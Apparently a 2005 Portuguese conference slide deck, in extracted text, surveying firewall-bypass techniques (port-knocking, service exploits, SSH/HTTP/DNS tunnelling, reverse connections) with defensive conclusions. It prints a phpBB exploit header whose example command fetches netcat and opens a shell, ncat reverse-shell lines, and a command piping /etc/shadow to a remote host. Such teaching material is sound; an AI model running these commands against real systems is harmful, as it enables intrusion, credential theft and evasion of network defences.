07 Firewalls Bypass PDF

Tcnicas utilizadas
para burlar Firewalls

Joo Marcelo Ceron
Emerson Virti
Liane Tarouco
Leandro Bertholdo
Sumrio
Introduo
Tcnicas utilizadas
Ferramentas
Testes realizados
Concluso
Joo Marcelo Ceron GTS

03/12/2005
Introduo
Firewall na poltica de segurana
Firewall: uma abordagem de segurana
Tipos de firewall:
Filtro de pacotes
-Stateless sem estado
-Stateful - com estado
Application Layer Gateway / Proxies

03/12/2005

03/12/2005

03/12/2005
Metodologia

03/12/2005
Metodologia
Basicamente dois tipos de abordagens
Trfego oriundo da rede externa ( Internet )

Trfego oriundo da rede interna ( instituio )
DMZ
Server
Server
Internet
03/12/2005
Trfego oriundo da rede externa
Port-Knocking
Explorao de servios disponveis
Erros de configurao
Tunelamento via servios disponveis

03/12/2005
Trfego oriundo da rede externa
Port-knocking
No ilcito, necessita de configurao

Segurana baseada no desconhecimento
Basicamente duas tcnicas:
Anlise dos logs

Anlise na captura integrada com a firewall
Baseado em contedo dos pacotes

Baseado em informaes do cabealho ( porta )

03/12/2005
Port-knocking
Seqncia secreta: porta 1111,2222,3333

03/12/2005
Explorao de servios
Explorao de alguma vulnerabilidade em

servios permitidos
Execuo de cdigo remoto no servidor

03/12/2005
Explorao de servios
Ataques diretos
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any

(msg: "Attack in phpBB"; flow: established,from_server;
content:"privmsg.php"; pcre:"/\<a href="[^"]*(script|about|
applet|activex|chrome)\s*\:/i"; reference:
url,www.securitytracker.com/alerts/2005/May/1013918.html;
classtype: web-application-attack; sid: 2001928; rev:2; )
Impacto:permite a execuo remota de comandos

03/12/2005
Explorao de servios
#!/usr/bin/perl
use IO::Socket;
##
## phpBB <= 2.0.10 remote commands exec exploit
if (@ARGV < 4)
{
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
###############################################
usage:
r57phpbb2034.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la" or
wget http://www.owned.com/nc.bin;./nc -e /bin/sh

www.mymachine.no-ip.org 80

03/12/2005
Tunelamento via servios disponveis
Tunelamento SSH
Situao:
Servio que no esta

acessvel diretamente,
mas acessvel a partir da
firewall
Exemplo: Acessar o
rdesktop em meu
desktop

03/12/2005
Abordagens
SSH

03/12/2005
Erros de configurao
Tabela de regras muito extensa

Complexidade
Algumas questes:
UDP liberado any to any
RST.b trojan honeynet case
ICMP liberado worms Nachi/Welchia

Outbound conexions

03/12/2005
Metodologia
Basicamente dois tipos de abordagens
Trfego oriundo da rede externa ( Internet )

Trfego oriundo da rede interna ( instituio )

03/12/2005
Tcnicas utilizadas
Firewall de nvel 3 e 4:
IP / TCP
S sai trfego para a porta 80
SSH na porta 80

03/12/2005
SSH Socks proxy
Cria um Socks proxy, para repasse dinmico

de portas no localhost.
Utilizado quando se deseja acessar mais de
um servio ou host.
Exemplo:
Acessar o IRC em uma rede onde s permite que

conexes SSH saiam

03/12/2005
Proxy SSH
ssh -l user@server -d 1080
1080
ssh
SSH server

03/12/2005
Conexes Reversas
Uma conexo interna iniciada, porm com

caractersticas de servidor.
nc pc.no-ip.org e /bin/sh
1080
nc -l -p 22 < echo welcome
SSH
pc.no-ip.org

03/12/2005
Conexes Reversas
SOCAT
NetCat com esteroides
socat -d -d READLINE, history=/tmp/hist TCP4:host:port,crnl

socat TCP4-LISTEN:2323,fork, su=nobody,tcpwrap=script
TCP4:host:www
socat TCP4-LISTEN:2323,fork, \
PROXY:proxy:ssh-host.tld:22, \
proxyport=3128,proxyauth=user:pass

03/12/2005
Conexes Reversas
cryptcat = netcat + encryption
servidor:
cryptcat -k ceron -l -p 23 | > /tmp/foo
cliente:
cat /etc/shadow | cryptcat -k ceron 1.1.1.1 23

03/12/2005
Conexes Reversas
NCAT
Redirecionamento de portas
ncat --exec "/bin/zsh" 8888

ncat --exec "./ncat www.example.com 80" -l 8888
Socks proxy
./ncat --allow 127.0.0.1/32 --socks4-server -l
5001

03/12/2005
Filtro de nvel 7
Verifica o protocolo
Todo trfego para a
porta 80 vai para o
Proxy
Proxy

03/12/2005
Tcnicas
Conexes Reversas
Tunelamento
Esteganografia

03/12/2005
Tunelamento
Valer-se de protocolos permitidos, para

embutir outros protocolos no permitidos
Encapsulao de dados

03/12/2005
Alguns exemplos
HTTP/S tnel
Tunelamento sobre UDP
FTP tnel
Mail tnel
Msn tnel
Ack tnel
DNS tnel
03/12/2005

03/12/2005

03/12/2005
Tunelamento HTTP
IP
TCP
SSH
HTTP
03/12/2005
Tunelamento HTTP
http tunel gnu http tunnel
Servidor
hts -F localhost:22 80
Cliente
htc -F 22 server:80

03/12/2005
Comparativo de trfego tunelado
tempo (s)
Trfego tunelado X Trfego normal

140
120
100
80
60
40
20
0
1
trfego tunelado
2
trfego normal
3
trfego proxy
Com tunelamento: media 40% de acrscimo de tempo

Com o proxy: um tempo em media 8 vezes maior.
03/12/2005
Tunelamento HTTP
Rwwwshell
Tunelamento via primitiva get ou post
Exemplo de conexo:
Cliente:
Slave GET
/cgi/bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFL
dgxEdb1He7krj HTTP/1.0
Master replies with g5mAlfbknz

03/12/2005
Abordagens

03/12/2005
Abordagens

03/12/2005
Precaues
CISCO HTTP Inspection Engine
Filtra trfego HTTP atravs da firewall baseado

em aplicaes especificas.
Baseado em assinaturas de aplicaes:
HTTPPort/HTTPHost, GNU Httptunnel, GotoMyPC,

Firethru, Http-tunnel.com Client
P2P- gnutella, kazaa
Instant message

03/12/2005
Tunel ICMP
ishd shell ping

03/12/2005
PHP Shell
Usurio pode ter

acesso facilmente
Dependente de
configurao
Apache rodando em
`Safe Mode`

03/12/2005
Esteganografia
Esconder informaes sem que ela seja

perceptvel
Stegtunnel
Esconde dados no cabealho do pacote IP.

03/12/2005
Tunelamento DNS
DNS TXT RFC 1464 1993
Using the Domain Name System To Store

Arbitrary String Attributes
tun.tche.br IN TXT qualquer coisa"

------------------------------------------------tun
IN
NS
tun.tche.br
tun.tche.br
IN
A
10.1.1.1
03/12/2005
Tunel DNS

03/12/2005
Concluses
Trfego tunelado
Monitoramento de trfego acumulado
Proxies
Aplicaes tuneladas

03/12/2005
Obrigado.
Perguntas ?
ceron@tche.br

03/12/2005

07 Firewalls Bypass PDF

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

07 Firewalls Bypass PDF

Enviado por

Direitos autorais:

Formatos disponíveis

Tcnicas utilizadas

para burlar Firewalls

Joo Marcelo Ceron GTS

Firewall na poltica de segurana

Firewall: uma abordagem de segurana

-Stateless sem estado

-Stateful - com estado

Application Layer Gateway / Proxies

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Basicamente dois tipos de abordagens

Trfego oriundo da rede externa ( Internet )

Trfego oriundo da rede externa

Joo Marcelo Ceron GTS

Trfego oriundo da rede externa

No ilcito, necessita de configurao

Anlise dos logs

Baseado em contedo dos pacotes

Joo Marcelo Ceron GTS

Seqncia secreta: porta 1111,2222,3333

Joo Marcelo Ceron GTS

Explorao de alguma vulnerabilidade em

Execuo de cdigo remoto no servidor

Joo Marcelo Ceron GTS

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any

Impacto:permite a execuo remota de comandos

Joo Marcelo Ceron GTS

wget http://www.owned.com/nc.bin;./nc -e /bin/sh

Joo Marcelo Ceron GTS

Tunelamento via servios disponveis

Servio que no esta

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Tabela de regras muito extensa

UDP liberado any to any

RST.b trojan honeynet case

ICMP liberado worms Nachi/Welchia

Joo Marcelo Ceron GTS

Basicamente dois tipos de abordagens

Trfego oriundo da rede externa ( Internet )

Joo Marcelo Ceron GTS

S sai trfego para a porta 80

Joo Marcelo Ceron GTS

SSH Socks proxy

Cria um Socks proxy, para repasse dinmico

Acessar o IRC em uma rede onde s permite que

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Uma conexo interna iniciada, porm com

nc -l -p 22 < echo welcome

Joo Marcelo Ceron GTS

socat -d -d READLINE, history=/tmp/hist TCP4:host:port,crnl

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

ncat --exec "/bin/zsh" 8888

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS

Valer-se de protocolos permitidos, para

Joo Marcelo Ceron GTS

Joo Marcelo Ceron GTS